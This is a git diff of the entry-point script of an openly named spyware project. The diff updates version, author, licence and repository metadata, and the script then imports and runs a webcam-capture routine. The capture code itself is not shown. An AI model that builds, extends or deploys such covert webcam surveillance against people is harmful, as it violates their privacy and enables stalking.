@@ -1,11 +1,9 @@
 #!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 
-""" This package a SpyWare to capture picture from webcam. """
-
 ###################
-#    This package a SpyWare to capture picture from webcam.
-#    Copyright (C) 2021  Maurice Lambert
+#    This file implements a SpyWare to take picture with Webcam.
+#    Copyright (C) 2021, 2022  Maurice Lambert
 
 #    This program is free software: you can redistribute it and/or modify
 #    it under the terms of the GNU General Public License as published by
@@ -21,18 +19,34 @@
 #    along with this program.  If not, see <https://www.gnu.org/licenses/>.
 ###################
 
+"""
+This file implements a SpyWare to take picture with Webcam.
+"""
+
+__version__ = "1.0.0"
+__author__ = "Maurice Lambert"
+__author_email__ = "mauricelambert434@gmail.com"
+__maintainer__ = "Maurice Lambert"
+__maintainer_email__ = "mauricelambert434@gmail.com"
+__description__ = """
+This file implements a complete spyware.
+"""
+license = "GPL-3.0 License"
+__url__ = "https://github.com/mauricelambert/SpyWare"
+
+copyright = """
+SpyWare  Copyright (C) 2021, 2022  Maurice Lambert
+This program comes with ABSOLUTELY NO WARRANTY.
+This is free software, and you are welcome to redistribute it
+under certain conditions.
+"""
+__license__ = license
+__copyright__ = copyright
+
 try:
     from .WebcamLogger import main as webcamSpy
 except ImportError:
     from WebcamLogger import main as webcamSpy
 
-print(
-    """
-WebcamLogger  Copyright (C) 2021  Maurice Lambert
-This program comes with ABSOLUTELY NO WARRANTY.
-This is free software, and you are welcome to redistribute it
-under certain conditions.
-"""
-)
-
-webcamSpy()
\ No newline at end of file
+print(copyright)
+webcamSpy()
